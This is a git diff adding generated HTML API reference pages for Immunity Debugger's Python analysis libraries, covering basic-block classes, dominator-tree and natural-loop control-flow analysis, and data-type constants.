+ Returns: BOOLEAN
+ Whether the Basic Block was created from a Conditional Jump
+ instruction
+
+
+
+
+
+ Check if a Basic Block was created from a Jump instruction
+
+ Returns: BOOLEAN
+ Whether the Basic Block was created from a Jump
+ instruction
+
+
+
+
+
+ Check if a Basic Block was created from a RET instruction
+
+ Returns: BOOLEAN
+ Whether the Basic Block was created from a RET instruction
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libanalize.Decode-class.html b/1.73/Documentation/Ref/Libs.libanalize.Decode-class.html
new file mode 100755
index 0000000..138e815
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libanalize.Decode-class.html
@@ -0,0 +1,482 @@
+
+
+
+
+ Libs.libanalize.Decode
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class Decode source code
+UserList.UserList --+
+ |
+ Decode
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ address )
+
+
+
+
+
+ __getitem__ (self ,
+ i )
+
+
+
+
+
+ __setitem__ (self ,
+ i ,
+ item )
+
+
+
+ BOOLEAN
+
+ isJmpDestination (self ,
+ i )
+
+
+
+ BOOLEAN
+
+ isCallDestination (self ,
+ i )
+
+
+
+ BOOLEAN
+
+ isCommand (self ,
+ i )
+
+
+
+ BOOLEAN
+
+ isFunctionStart (self ,
+ i )
+
+
+
+ BOOLEAN
+
+ isFunctionBody (self ,
+ i )
+
+
+
+ Inherited from UserList.UserList :
+ __add__,
+ __cmp__,
+ __contains__,
+ __delitem__,
+ __delslice__,
+ __eq__,
+ __ge__,
+ __getslice__,
+ __gt__,
+ __iadd__,
+ __imul__,
+ __le__,
+ __len__,
+ __lt__,
+ __mul__,
+ __ne__,
+ __radd__,
+ __repr__,
+ __rmul__,
+ __setslice__,
+ append,
+ count,
+ extend,
+ index,
+ insert,
+ pop,
+ remove,
+ reverse,
+ sort
+
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ address )(Constructor)
+ source code
+
+ Internal Information of the Analyzed Code
+
+ Parameters:
+ addressDWORD) - Address in the range of the analized code you want to
+ retrieve
+ Overrides:
+ UserList.UserList.__init__
+
+
+
+
+
+
+ __getitem__ (self ,
+ i )(Indexing operator)
+ source code
+
+ None
+
+ Overrides:
+ UserList.UserList.__getitem__
+
+
+
+
+
+
+ __setitem__ (self ,
+ i ,
+ item )(Index assignment operator)
+ source code
+
+ None
+
+ Overrides:
+ UserList.UserList.__setitem__
+
+
+
+
+
+
+ Check Whether or not the provided address is a destination for a jmp
+ instruction
+
+ Parameters:
+ iDWORD) - Address to check
+ Returns: BOOLEAN
+ Whether or not the provided address is a destination for a jmp
+ instruction
+
+
+
+
+
+ Check Whether or not the provided address is a destination for a call
+ instruction
+
+ Parameters:
+ iDWORD) - Address to check
+ Returns: BOOLEAN
+ Whether or not the provided address is a destination for a
+ call instruction
+
+
+
+
+
+ Check Whether or not the provided address has a command (regular
+ opcode)
+
+ Parameters:
+ iDWORD) - Address to check
+ Returns: BOOLEAN
+ Whether or not the provided address a command (regular
+ opcode)
+
+
+
+
+
+ Check Whether or not the provided address is the begging of a
+ Function
+
+ Parameters:
+ iDWORD) - Address to check
+ Returns: BOOLEAN
+ Whether or not the provided address is the begging of a
+ Function
+
+
+
+
+
+ Check Whether or not the provided address is part of a Function
+
+ Parameters:
+ iDWORD) - Address to check
+ Returns: BOOLEAN
+ Check Whether or not the provided address is part of a
+ Function
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libanalize.Function-class.html b/1.73/Documentation/Ref/Libs.libanalize.Function-class.html
new file mode 100755
index 0000000..fe73d34
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libanalize.Function-class.html
@@ -0,0 +1,471 @@
+
+
+
+
+ Libs.libanalize.Function
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class Function source code
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ start )
+
+
+
+
+
+ setStart (self ,
+ address )
+
+
+
+ DWORD
+
+ getStart (self )
+
+
+
+ STRING
+
+ getName (self )
+
+
+
+
+
+ getFunctionEnd (self )
+
+
+
+ LIST of BasicBlock
+
+ getEnd (self )
+
+
+
+
+
+ findRetValue (self )
+
+
+
+ BasicBlock object
+
+ hasAddress (self ,
+ address )
+
+
+
+ LIST of BasicBlock objects
+
+ getBasicBlocks (self ,
+ force =False )
+
+
+
+
+
+ _getBB (self ,
+ address )
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ start )(Constructor)
+ source code
+
+ Class that contains information about a Function
+
+ Parameters:
+ immDebbuger OBJECT) - DebbugerstartDWORD) - Address of the begging of the function
+
+
+
+
+
+
+ Change the start of a Function
+
+ Parameters:
+ addressDWORD) - New address of the function
+
+
+
+
+
+
+ Get the Address of the Function
+
+ Returns: DWORD
+ Address of the function
+
+
+
+
+
+ Get the name of the Function
+
+ Returns: STRING
+ Name of the Function
+
+
+
+
+
+ Get the end of the Function (Understanding end as the Basic Block with
+ a ret inside)
+
+ Returns: LIST of BasicBlock
+ A list of all the basic block that end the function
+
+
+
+
+
+ Find all the possible ret values on a function (Beta) Note: This
+ function only check the modifiers on a Ret BasicBlock, so the result
+ might not be precise.
+
+ Parameters:
+ startLIST OF OPCODE) - Return all the possible modifiers of EAX
+
+
+
+
+
+
+ Check if the given address is part of the Function
+
+ Parameters:
+ force
+ Returns: BasicBlock object
+ If true, returns the corresponding Basic block else returns
+ None
+
+
+
+
+
+ getBasicBlocks (self ,
+ force =False ) source code
+
+ Get basic block from the current Function
+
+ Parameters:
+ forceBOOLEAN) - (Optional, Def: False) Force to Function to reparse the basic
+ blocks
+ Returns: LIST of BasicBlock objects
+ Basic blocks of the current function
+ TODO: Recursion here is bad - we need to make this an
+ iterative process with a work queue
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libanalize.JMCBasicBlock-class.html b/1.73/Documentation/Ref/Libs.libanalize.JMCBasicBlock-class.html
new file mode 100755
index 0000000..101c617
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libanalize.JMCBasicBlock-class.html
@@ -0,0 +1,224 @@
+
+
+
+
+ Libs.libanalize.JMCBasicBlock
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class JMCBasicBlock source code
+BasicBlock --+
+ |
+ JMCBasicBlock
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ start ,
+ end )
+
+
+
+ Inherited from BasicBlock :
+ __cmp__ addFalseEdge addTrueEdge getCalls getDirectEdge getEdges getEnd getFalseEdge getFunction getInstructions getLimits getSize getStart getTrueEdge isConditionalJmp isJmp isRet isXref setCalls setEnd setFunction setStart
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ start ,
+ end )(Constructor)
+ source code
+
+ Conditional Jump Basic Block, Basic Block created from a conditional
+ jump instruction (branch node)
+
+ Parameters:
+ startDWORD) - Address of the begging of the Basic BlockendDWORD) - Address of the end of the Basic Block
+ Overrides:
+ BasicBlock.__init__
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libanalize.JMPBasicBlock-class.html b/1.73/Documentation/Ref/Libs.libanalize.JMPBasicBlock-class.html
new file mode 100755
index 0000000..ca04bea
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libanalize.JMPBasicBlock-class.html
@@ -0,0 +1,222 @@
+
+
+
+
+ Libs.libanalize.JMPBasicBlock
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class JMPBasicBlock source code
+BasicBlock --+
+ |
+ JMPBasicBlock
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ start ,
+ end )
+
+
+
+ Inherited from BasicBlock :
+ __cmp__ addFalseEdge addTrueEdge getCalls getDirectEdge getEdges getEnd getFalseEdge getFunction getInstructions getLimits getSize getStart getTrueEdge isConditionalJmp isJmp isRet isXref setCalls setEnd setFunction setStart
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ start ,
+ end )(Constructor)
+ source code
+
+ Jump Basic Block, Basic Block created from a jump instruction
+
+ Parameters:
+ startDWORD) - Address of the begging of the Basic BlockendDWORD) - Address of the end of the Basic Block
+ Overrides:
+ BasicBlock.__init__
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libanalize.RETBasicBlock-class.html b/1.73/Documentation/Ref/Libs.libanalize.RETBasicBlock-class.html
new file mode 100755
index 0000000..1e4ae3d
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libanalize.RETBasicBlock-class.html
@@ -0,0 +1,224 @@
+
+
+
+
+ Libs.libanalize.RETBasicBlock
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class RETBasicBlock source code
+BasicBlock --+
+ |
+ RETBasicBlock
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ start ,
+ end )
+
+
+
+ Inherited from BasicBlock :
+ __cmp__ addFalseEdge addTrueEdge getCalls getDirectEdge getEdges getEnd getFalseEdge getFunction getInstructions getLimits getSize getStart getTrueEdge isConditionalJmp isJmp isRet isXref setCalls setEnd setFunction setStart
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ start ,
+ end )(Constructor)
+ source code
+
+ RET Basic Block, Basic Block created from a RET instruction (exit
+ node)
+
+ Parameters:
+ startDWORD) - Address of the begging of the Basic BlockendDWORD) - Address of the end of the Basic Block
+ Overrides:
+ BasicBlock.__init__
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libanalize.TraceArgs-class.html b/1.73/Documentation/Ref/Libs.libanalize.TraceArgs-class.html
new file mode 100755
index 0000000..71f24c4
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libanalize.TraceArgs-class.html
@@ -0,0 +1,268 @@
+
+
+
+
+ Libs.libanalize.TraceArgs
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class TraceArgs source code
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ func_address ,
+ tracedarg ,
+ shownonusersupplied =False )
+
+
+
+
+
+ get (self )
+
+
+
+
+
+ traceArgBackWithDecode (self ,
+ address ,
+ register )
+
+
+
+
+
+ traceArgBack (self ,
+ address ,
+ register )
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ func_address ,
+ tracedarg ,
+ shownonusersupplied =False )(Constructor)
+ source code
+
+ None
+
+
+
+
+
+
+
+ traceArgBackWithDecode (self ,
+ address ,
+ register ) source code
+
+ None
+
+
+
+
+
+
+
+ traceArgBack (self ,
+ address ,
+ register ) source code
+
+ None
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libanalize.XREFBasicBlock-class.html b/1.73/Documentation/Ref/Libs.libanalize.XREFBasicBlock-class.html
new file mode 100755
index 0000000..f9edef2
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libanalize.XREFBasicBlock-class.html
@@ -0,0 +1,222 @@
+
+
+
+
+ Libs.libanalize.XREFBasicBlock
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class XREFBasicBlock source code
+BasicBlock --+
+ |
+ XREFBasicBlock
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ start ,
+ end )
+
+
+
+ Inherited from BasicBlock :
+ __cmp__ addFalseEdge addTrueEdge getCalls getDirectEdge getEdges getEnd getFalseEdge getFunction getInstructions getLimits getSize getStart getTrueEdge isConditionalJmp isJmp isRet isXref setCalls setEnd setFunction setStart
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ start ,
+ end )(Constructor)
+ source code
+
+ XREF Basic Block, Basic Block created from a code reference
+
+ Parameters:
+ startDWORD) - Address of the begging of the Basic BlockendDWORD) - Address of the end of the Basic Block
+ Overrides:
+ BasicBlock.__init__
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libanalize.opCode-class.html b/1.73/Documentation/Ref/Libs.libanalize.opCode-class.html
new file mode 100755
index 0000000..211aed4
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libanalize.opCode-class.html
@@ -0,0 +1,1404 @@
+
+
+
+
+ Libs.libanalize.opCode
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class opCode source code
+
+
+
+
+ __init__ (self ,
+ imm ,
+ addr )(Constructor)
+ source code
+
+ None
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libcontrolflow-module.html b/1.73/Documentation/Ref/Libs.libcontrolflow-module.html
new file mode 100755
index 0000000..94b692c
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libcontrolflow-module.html
@@ -0,0 +1,207 @@
+
+
+
+
+ Libs.libcontrolflow
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libcontrolflow
+
+
+
+
+
+
+
+
+Module libcontrolflow source code (c) Immunity, Inc. 2004-2007
+ Immunity
+ Inc.
+
+
+ __VERSION__
+ None
+
+ Value:
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libcontrolflow-pysrc.html b/1.73/Documentation/Ref/Libs.libcontrolflow-pysrc.html
new file mode 100755
index 0000000..4edb283
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libcontrolflow-pysrc.html
@@ -0,0 +1,362 @@
+
+
+
+
+ Libs.libcontrolflow
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libcontrolflow
+
+
+
+
+
+
+
+
+
+ 1
+ 2
+ 3 """ 4 (c) Immunity, Inc. 2004-2007 5 6 7 U{Immunity Inc.<http://www.immunityinc.com>} 8 9 10 """ 11
+ 12 __VERSION__ = '1.0'
+ 13
+ 14
+
16 - def __init__ ( self , imm , addr , blocks = False , recursion = False ) :
+
17 """
+
18 This class takes a function start address and calculate all Dominator Tree related tables:
+
19 - Predecessors
+
20 - Iterated Predecessors
+
21 - Dominators
+
22 - Immediate Dominators
+
23 - Post Dominators
+
24 - Immediate Post Dominators
+
25
+
26 @type imm: Debbuger OBJECT
+
27 @param imm: Debbuger
+
28
+
29 @type addr: DWORD
+
30 @param addr: function start address
+
31
+
32 @type blocks: DICTIONARY|False
+
33 @param blocks: Optionally you can provide a dictionary with the node address as key and a list of edges (mainly for testing purposes).
+
34 """
+
35
+
36 self . address = addr
+
37 self . imm = imm
+
38 self . blocks = { }
+
39 self . predecessors = { }
+
40 self . iterativepredecessors = { }
+
41 self . dominators = { }
+
42 self . immediatedominators = { }
+
43 self . postdominators = { }
+
44 self . immediatepostdominators = { }
+
45
+
46 if blocks :
+
47 self . blocks = blocks
+
48 else :
+
49 self . Initializate ( )
+
50
+
51 self . CalculatePredecessors ( )
+
52 self . CalculateDominators ( )
+
53 self . CalculateImmediateDominators ( )
+
54 if not recursion :
+
55 self . CalculatePostAndImmediatePostDominators ( )
+
56 self . CalculateIterativePredecessors ( )
+
57
+
59 func = self . imm . getFunction ( self . address )
+
60 blocks = func . getBasicBlocks ( )
+
61
+
62 for block in blocks :
+
63 edges = block . getEdges ( )
+
64 start = block . getStart ( )
+
65 self . blocks [ start ] = edges
+
66
+
67
+
69 for start , edges in self . blocks . iteritems ( ) :
+
70
+
71 for edge in edges :
+
72 if edge :
+
73 if edge not in self . predecessors . keys ( ) :
+
74 self . predecessors [ edge ] = [ ]
+
75 self . predecessors [ edge ] . append ( start )
+
76
+
78 for start in self . blocks :
+
79 self . iterativepredecessors [ start ] = [ ]
+
80 if start in self . predecessors . keys ( ) :
+
81 self . __iterative_predecessors_helper ( start , start )
+
82
+
84 for pred in self . predecessors [ newbase ] :
+
85 if pred :
+
86 if newbase in self . dominators [ pred ] :
+
87
+
88 continue
+
89 if pred not in self . iterativepredecessors [ base ] :
+
90 self . iterativepredecessors [ base ] . append ( pred )
+
91 if pred in self . predecessors . keys ( ) :
+
92 self . __iterative_predecessors_helper ( base , pred )
+
93
+
95 """
+
96 Based in algorithm from "Advanced COMPILER DESIGN IMPLEMENTATION"
+
97 """
+
98
+
99 start = self . address
+
100 change = True
+
101 Domin = { }
+
102 Domin [ start ] = [ start ]
+
103 for n in self . blocks :
+
104 if n != start :
+
105 if n in self . predecessors . keys ( ) :
+
106 Domin [ n ] = self . blocks . keys ( )
+
107 else :
+
108
+
109 Domin [ n ] = [ n ]
+
110
+
111 for n in Domin :
+
112 tmp = Domin [ n ]
+
113 tmp . sort ( )
+
114 Domin [ n ] = tmp
+
115
+
116 while change :
+
117 change = False
+
118 for n in self . blocks :
+
119 if n != start and n in self . predecessors . keys ( ) :
+
120 T = self . blocks . keys ( )
+
121 for p in self . predecessors [ n ] :
+
122
+
123 intersect = [ ]
+
124 for d in Domin [ p ] :
+
125 if d in T and d not in intersect :
+
126 intersect . append ( d )
+
127 T = intersect
+
128
+
129
+
130 D = intersect
+
131 if n not in D :
+
132 D . append ( n )
+
133
+
134 D . sort ( )
+
135 if D != Domin [ n ] :
+
136 change = True
+
137 Domin [ n ] = D
+
138
+
139 self . dominators = Domin
+
140
+
142 for node in self . blocks :
+143 idom = self . dominators [ node ] [ : ]
+144
+145 idom . remove ( node )
+146 for dom in self . dominators [ node ] :
+147 if dom != node :
+148 for sec_dom in self . dominators [ dom ] :
+149 if sec_dom != dom and sec_dom in idom :
+150 idom . remove ( sec_dom )
+151 self . immediatedominators [ node ] = idom
+
152
+
154 invertedCFG = self . predecessors
+
155 invertedCFG [ self . address ] = [ 0 ]
+
156
+
157 newstart = invertedCFG . keys ( )
+
158 for edges in invertedCFG . values ( ) :
+
159 for edge in edges :
+
160 if edge in newstart :
+
161 newstart . remove ( edge )
+
162
+
163 for onestart in newstart :
+
164 dom = DominatorTree ( self . imm , onestart , blocks = invertedCFG , recursion = True )
+
165 self . postdominators [ onestart ] = dom . dominators
+
166 self . immediatepostdominators [ onestart ] = dom . immediatedominators
+
167
+
169 return self . dominators
+
170
+
172 return self . immediatedominators
+
173
+
174 - def getPostDominators ( self ) :
+
175 return self . postdominators
+
176
+
178 return self . immediatepostdominators
+
179
+
181 return self . predecessors
+
182
+
184 return self . iterativepredecessors
+
185
+
187 return self . blocks
+
188
+189
+
191 - def __init__ ( self , imm , address , domtree = False ) :
+
192 """
+
193 @type imm: Debbuger OBJECT
+
194 @param imm: Debbuger
+
195
+
196 @type address: DWORD
+
197 @param address: function start address
+
198
+
199 @type domtree: OBJECT|False
+
200 @param domtree: Optionally you can provide a DominatorTree instance (mainly for testing purposes).
+
201 """
+
202
+
203 self . imm = imm
+
204 self . address = address
+
205 self . loops = [ ]
+
206
+
207 if domtree :
+
208 self . domtree = domtree
+
209 else :
+
210 self . domtree = DominatorTree ( self . imm , self . address )
+
211
+
213 """
+
214 This function finds Natural Loops inside a function, using the information provided by dominator tree class.
+
215
+
216 @rtype: LIST
+
217 @return: A list of loops, each with this structure:
+
218 [ start, end, nodes ]
+
219 start: address of node receiving the back edge
+
220 end: address of node which has the back edge
+
221 node: list of node's addresses involved in this loop
+
222 """
+
223
+
224 for start , edges in self . domtree . blocks . items ( ) :
+
225 for edge in edges :
+
226 if edge and edge in self . domtree . dominators [ start ] :
+
227 loopNodes = [ ]
+
228 for pred in self . domtree . iterativepredecessors [ start ] :
+
229 if pred not in self . domtree . iterativepredecessors [ edge ] :
+
230 loopNodes . append ( pred )
+
231 loopNodes . append ( start )
+
232 self . loops . append ( [ edge , start , loopNodes ] )
+
233
+
234 return self . loops
+
235
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libcontrolflow.ControlFlowAnalysis-class.html b/1.73/Documentation/Ref/Libs.libcontrolflow.ControlFlowAnalysis-class.html
new file mode 100755
index 0000000..5676b7a
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libcontrolflow.ControlFlowAnalysis-class.html
@@ -0,0 +1,221 @@
+
+
+
+
+ Libs.libcontrolflow.ControlFlowAnalysis
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class ControlFlowAnalysis source code
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ address ,
+ domtree =False )
+
+
+
+ LIST
+
+ findNaturalLoops (self )
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ address ,
+ domtree =False )(Constructor)
+ source code
+
+
+
+ Parameters:
+ immDebbuger OBJECT) - DebbugeraddressDWORD) - function start addressdomtreeOBJECT|False) - Optionally you can provide a DominatorTree instance (mainly
+ for testing purposes).
+
+
+
+
+
+
+ This function finds Natural Loops inside a function, using the
+ information provided by dominator tree class.
+
+ Returns: LIST
+ A list of loops, each with this structure: [ start, end, nodes
+ ] start: address of node receiving the back edge end: address of
+ node which has the back edge node: list of node's addresses
+ involved in this loop
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libcontrolflow.DominatorTree-class.html b/1.73/Documentation/Ref/Libs.libcontrolflow.DominatorTree-class.html
new file mode 100755
index 0000000..8f53b1c
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libcontrolflow.DominatorTree-class.html
@@ -0,0 +1,588 @@
+
+
+
+
+ Libs.libcontrolflow.DominatorTree
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class DominatorTree source code
+
+
+
+
+ __init__ (self ,
+ imm ,
+ addr ,
+ blocks =False ,
+ recursion =False )(Constructor)
+ source code
+
+
+
+This class takes a function start address and calculate all Dominator Tree related tables:
+- Predecessors
+- Iterated Predecessors
+- Dominators
+- Immediate Dominators
+- Post Dominators
+- Immediate Post Dominators
+
+@type imm: Debbuger OBJECT
+@param imm: Debbuger
+
+@type addr: DWORD
+@param addr: function start address
+
+@type blocks: DICTIONARY|False
+@param blocks: Optionally you can provide a dictionary with the node address as key and a list of edges (mainly for testing purposes).
+
+
+
+
+
+
+
+
+
+ CalculateIterativePredecessors (self ) source code
+
+ None
+
+
+
+
+
+
+
+ __iterative_predecessors_helper (self ,
+ base ,
+ newbase ) source code
+
+ None
+
+
+
+
+
+
+
+ Based in algorithm from "Advanced COMPILER DESIGN
+ IMPLEMENTATION"
+
+
+
+
+
+
+
+ CalculateImmediateDominators (self ) source code
+
+ None
+
+
+
+
+
+
+
+ CalculatePostAndImmediatePostDominators (self ) source code
+
+ None
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libdatatype-module.html b/1.73/Documentation/Ref/Libs.libdatatype-module.html
new file mode 100755
index 0000000..1fcd28c
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libdatatype-module.html
@@ -0,0 +1,363 @@
+
+
+
+
+ Libs.libdatatype
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libdatatype
+
+
+
+
+
+
+
+
+Module libdatatype source code
+Immunity Discovery Data Type API for Immunity Debugger
+ (c) Immunity, Inc. 2004-2007
+ Immunity Inc.
+ Discovery Data Type API for python
+
+
+
+
+
+
+
+
+ __VERSION__ = '1.1'
+
+
+
+
+
+ MEM = 1
+
+
+
+
+
+
+ DWORD = 2
+
+
+
+
+
+
+ MEM_ADDR = 3
+
+
+
+
+
+
+ INT = 0
+
+
+
+
+
+
+ STRING = 1
+
+
+
+
+
+
+ UNICODE = 2
+
+
+
+
+
+
+ POINTER = 3
+
+
+
+
+
+
+ DOUBLEL = 4
+
+
+
+
+
+
+ PLAINASCII = 1
+
+
+
+
+
+
+ DIACRITICAL = 2
+
+
+
+
+
+
+ RAREASCII = 16
+
+
+
+
+
+
+ ctable = [0, 0, 0, 0, 0, 0, 0, 0, 0, 19, 19, 0, 0, 19, 0, 0, 0...
+
+
+
+
+
+ PTR = 0
+
+
+
+
+
+
+ FUNCTION_PTR = 1
+
+
+
+
+
+
+ DATA_PTR = 2
+
+
+
+
+
+
+ STACK_PTR = 3
+
+
+
+
+
+
+
+ ctable
+
+
+
+
+ Value:
+
+[0,
+ 0,
+ 0,
+ 0,
+ 0,
+ 0,
+ 0,
+ 0,
+...
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libdatatype-pysrc.html b/1.73/Documentation/Ref/Libs.libdatatype-pysrc.html
new file mode 100755
index 0000000..4c073bb
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libdatatype-pysrc.html
@@ -0,0 +1,910 @@
+
+
+
+
+ Libs.libdatatype
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libdatatype
+
+
+
+
+
+
+
+
+
+ 1
+ 2 """ 3 Immunity Discovery Data Type API for Immunity Debugger 4 5 (c) Immunity, Inc. 2004-2007 6 7 8 U{Immunity Inc.<http://www.immunityinc.com>} Discovery Data Type API for python 9 10 11 12 """ 13
+ 14 __VERSION__ = '1.1' 15
+ 16 import immutils 17 import struct 18
+ 19 MEM = 1 20 DWORD = 2 21 MEM_ADDR = 3 22
+ 23 INT = 0 24 STRING = 1 25 UNICODE = 2 26 POINTER = 3 27 DOUBLEL = 4 28
+ 29 PLAINASCII = 0x01 30 DIACRITICAL = 0x02 31 RAREASCII = 0x10 32
+ 33 ctable = [ 34
+ 35 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 ,
+ 36 0x00 , 0x13 , 0x13 , 0x00 , 0x00 , 0x13 , 0x00 , 0x00 ,
+ 37
+ 38 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 ,
+ 39 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 ,
+ 40
+ 41 0x03 , 0x13 , 0x13 , 0x13 , 0x13 , 0x13 , 0x13 , 0x13 ,
+ 42 0x13 , 0x13 , 0x13 , 0x13 , 0x13 , 0x13 , 0x13 , 0x13 ,
+ 43
+ 44 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 ,
+ 45 0x03 , 0x03 , 0x13 , 0x13 , 0x13 , 0x13 , 0x13 , 0x13 ,
+ 46
+ 47 0x13 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 ,
+ 48 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 ,
+ 49
+ 50 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 ,
+ 51 0x03 , 0x03 , 0x03 , 0x13 , 0x13 , 0x13 , 0x13 , 0x13 ,
+ 52
+ 53 0x13 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 ,
+ 54 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 ,
+ 55
+ 56 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 , 0x03 ,
+ 57 0x03 , 0x03 , 0x03 , 0x13 , 0x13 , 0x13 , 0x13 , 0x00 ,
+ 58
+ 59 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 ,
+ 60 0x00 , 0x00 , 0x02 , 0x00 , 0x02 , 0x02 , 0x02 , 0x02 ,
+ 61
+ 62 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 ,
